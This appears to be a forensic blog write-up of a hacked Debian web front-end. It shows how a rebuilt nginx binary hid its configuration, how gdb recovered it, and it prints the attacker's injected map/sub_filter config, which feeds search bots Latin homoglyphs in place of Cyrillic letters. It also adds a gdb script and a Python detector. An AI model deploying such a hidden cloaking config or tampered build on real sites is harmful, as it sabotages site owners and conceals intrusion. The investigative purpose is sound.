When 'a' is not equal to 'a'. In the wake of a hack

A very unpleasant story happened to one of my friends. But while it was unpleasant for Mikhail, it was just as entertaining for me.

I should say that my friend is a fairly competent UNIX user: he can install mysql and php himself and write simple nginx configs.
And he has a dozen or a dozen and a half websites devoted to hand tools.

One of these sites, devoted to chainsaws, sits firmly in the TOP of the search engines. The site is a non-commercial review site, but someone took it into their head to attack it. First a DDoS, then heavy flooding, then nasty comments were posted and malicious complaints were sent to the hosting provider and to RKN.
Suddenly everything went quiet, and this quiet turned out to be no good thing: the site began to slip from the top lines of the search results.


That was the prehistory; now the story itself, from the administrator's side.

Close to bedtime the phone rang: "San, could you take a look at my server? It seems to me I've been hacked. I can't prove it, but the feeling hasn't left me for the third week now. Maybe it's time I got treated for paranoia?"

What followed was half an hour of conversation that can be summarized like this:

  • the ground for a hack is very fertile;
  • an attacker could have obtained superuser rights;
  • the attack (if there was one) was aimed specifically at this site;
  • the problem spots have already been fixed, we only need to find out whether there was an intrusion;
  • the hack could not have touched the site code or the databases.

About the last point.


Only the front-end IP looks out onto the world. There is no exchange between the back-ends and the front-end other than http(s), the users/passwords differ, and no keys were exchanged. On the grey (private) addresses all ports except 80/443 are closed. The white (public) back-end IPs are known to only two users, whom Mikhail trusts completely.

The front-end runs Debian 9 and, by the time of the call, the system had been cut off from the world by an external firewall and shut down.

"Ok, give me access," I decided to put sleep off for an hour. "I'll have a look with my own eyes."

Here and further on:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Looking for a possible hack

I start the server, first in rescue mode. I mount the disks and leaf through the auth logs, history, system logs and so on, checking file creation dates wherever possible, although I understand that a competent intruder "sweeps up" after himself, and Misha has already "trampled" over everything while looking for him on his own.

I boot into normal mode, still not quite sure what to look for, and study the configs. nginx interests me first of all, because as a rule there is nothing else on a front-end besides it.
The configs are small and neatly split across a dozen files, so I just cat them one by one. Everything looks clean, but you never know whether you have missed some include, so let me build the full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I didn't get it: "Where is the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question joined the listing question: "Why such an old nginx?"

What is more, the system believes a newer version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you build nginx yourself?
- Wait, I don't even know how to do that!
- Well then, go to sleep...

nginx has definitely been rebuilt, and the listing output of "-T" has been hidden for some reason. There is no longer any doubt about the hack, and one could simply accept that (all the more since Misha had already replaced the server with a new one) and consider the problem solved.

Indeed, once someone has obtained root, only a reinstall of the system makes sense, and looking for what exactly is wrong is pointless, but this time curiosity got the better of sleep. How do we find out what they wanted to hide from us?

Let's try tracing:

$ strace nginx -T

We look, and output lines of this kind are clearly missing:

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "n", 1

Just for fun, let's compare the findings.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I assume that the fragment of code in src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

was brought to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so that "-T" no longer shows the listing.

But how do we get to see our config?

If I am right and the problem is only in the ngx_dump_config variable, let's try setting it with gdb. Luckily the -g in --with-cc-opt is a gift, and hopefully the -O2 optimization won't get in our way. At the same time, since I don't know exactly how ngx_dump_config might be handled in case 'T':, we won't go through that block but will set the variable while running with case 't':.

Why can '-t' be used instead of '-T'? Because the if (ngx_dump_config) block sits inside if (ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Of course, if the code was changed in this part rather than in case 'T':, my method won't work.

Test nginx.conf

Since the problem reproduces in tests, I settled on a minimal configuration for working with the malicious nginx build, something like:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We'll use it for brevity in the article.

Run the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Steps:

  • set a breakpoint in the main() function
  • run the program
  • change the value of the variable that controls the config output: ngx_dump_config=1
  • continue/finish the program

As we can see, the real configuration differs from ours, so let's pick out the extra fragment from it:
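The four steps above as a non-interactive gdb command file, so the dump can be repeated on a copy of the binary without typing into a live session. This is an added example, not part of the article: the file name nginx-dump.gdb and the config path /tmp/test-nginx.conf are assumptions, and it relies on the same unstripped build (-g in --with-cc-opt) so that ngx_dump_config resolves by name.

```gdb
# nginx-dump.gdb (assumed name): force the config dump on a build whose "-T" was neutered.
# Requires debug symbols; without them the global ngx_dump_config cannot be named.
set pagination off
break main
run
# Flip the flag before the config is parsed. The dump block in main() is guarded
# by ngx_test_config, which "-t" already sets, so "-T" is not needed at all.
set var ngx_dump_config = 1
continue
quit
```

Run it as `gdb -batch -x nginx-dump.gdb --args nginx -t -c /tmp/test-nginx.conf`; the "# configuration file ..." listing then appears on stdout exactly as in the interactive session above, and -batch makes gdb exit once nginx does.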

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's look at what is here, in order.

The yandex/google User-Agents are flagged:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

WordPress service pages are excluded:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for requests that fall under both rules above

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the text of the html pages the Cyrillic 'о' is replaced with the Latin 'o' and the Cyrillic 'а' with the Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

True, the only trick is that the Cyrillic 'а' (U+0430) != the Latin 'a' (U+0061), just as the Cyrillic 'о' (U+043E) != the Latin 'o' (U+006F).

So the search engine bots, instead of 100% Cyrillic text, receive rubbish in which the Cyrillic 'а' and 'о' have been swapped for Latin ones. I won't venture to discuss how exactly this affects SEO, but a hodgepodge of letters is unlikely to do positions in the search results any good.

What can I say, inventive guys.
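The practical check a defender wants after reading this is to fetch the same page as a browser and as a search bot and look for words that mix Cyrillic and Latin letters, which is exactly the residue the sub_filter above leaves behind. The following is an added example, not code from the article: it re-implements the dumped map/sub_filter logic in Python so it can be run offline against a constructed page body, and then scans the "bot view" for mixed-script words. The User-Agent strings and the sample HTML are constructed for the example; the match substrings and the two homoglyph pairs are the ones in the dumped config.

```python
import re
import unicodedata

# Homoglyph pairs used by the rogue sub_filter in the dumped config:
# Cyrillic small letter o (U+043E) -> Latin o, Cyrillic small letter a (U+0430) -> Latin a.
CYR_TO_LAT = {"\u043e": "o", "\u0430": "a"}

# User-Agent strings for the comparison (constructed for this example; the
# substrings "yandex.com/bots" and "www.google.com/bot.html" come from the map).
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
YANDEXBOT_UA = "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"

# Constructed page body: "Бензопила Husqvarna: обзор и отзывы", written with
# escapes so every Cyrillic letter is unambiguous.
SAMPLE_HTML = (
    "<p>\u0411\u0435\u043d\u0437\u043e\u043f\u0438\u043b\u0430 Husqvarna: "
    "\u043e\u0431\u0437\u043e\u0440 \u0438 \u043e\u0442\u0437\u044b\u0432\u044b</p>"
)


def is_search_bot(user_agent):
    """Mirror of the $sign_user_agent map: case-insensitive substring match."""
    ua = user_agent.lower()
    return "yandex.com/bots" in ua or "www.google.com/bot.html" in ua


def is_wp_uri(uri):
    """Mirror of the $sign_uri map: "~*/wp-" is an unanchored, case-insensitive regex."""
    return "/wp-" in uri.lower()


def serve(html, user_agent, uri):
    """Emulate the rogue front-end: substitute only when $sign_user_agent is 1 and $sign_uri is 0."""
    if is_search_bot(user_agent) and not is_wp_uri(uri):
        for cyr, lat in CYR_TO_LAT.items():
            html = html.replace(cyr, lat)  # sub_filter_once off: replace every occurrence
    return html


_WORD_RE = re.compile(r"\w+")  # \w matches Cyrillic letters in Python 3 str patterns


def _script(ch):
    """Return 'Cyrillic', 'Latin' or '' for one character, judged by its Unicode name."""
    if not ch.isalpha():
        return ""
    name = unicodedata.name(ch, "")
    for script in ("CYRILLIC", "LATIN"):
        if name.startswith(script):
            return script.capitalize()
    return ""


def mixed_script_words(text):
    """Words containing both Cyrillic and Latin letters: the fingerprint of homoglyph substitution."""
    found = []
    for word in _WORD_RE.findall(text):
        scripts = {s for s in map(_script, word) if s}
        if len(scripts) > 1:
            found.append(word)
    return found


def compare_views(html, uri="/"):
    """Diff what a browser receives against what Googlebot receives for the same page."""
    browser_view = serve(html, BROWSER_UA, uri)
    bot_view = serve(html, GOOGLEBOT_UA, uri)
    return {
        "identical": browser_view == bot_view,
        "suspicious_words": mixed_script_words(bot_view),
    }


if __name__ == "__main__":
    for path in ("/", "/wp-admin/"):
        print(path, compare_views(SAMPLE_HTML, path))
```

Against a live site, replace `serve()` with two real fetches of the same URL, one with each User-Agent, and feed the responses to `mixed_script_words()`; a page that is clean for a browser but comes back with mixed-script words for a bot is being cloaked on the front-end, and a whole-word mixed-script test catches it regardless of which letters were chosen, not only 'а' and 'о'.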

References

Debugging with GDB
gdb(1) Linux man page
strace(1) Linux man page
Nginx: ngx_http_sub_module
About saws, saws and chainsaws
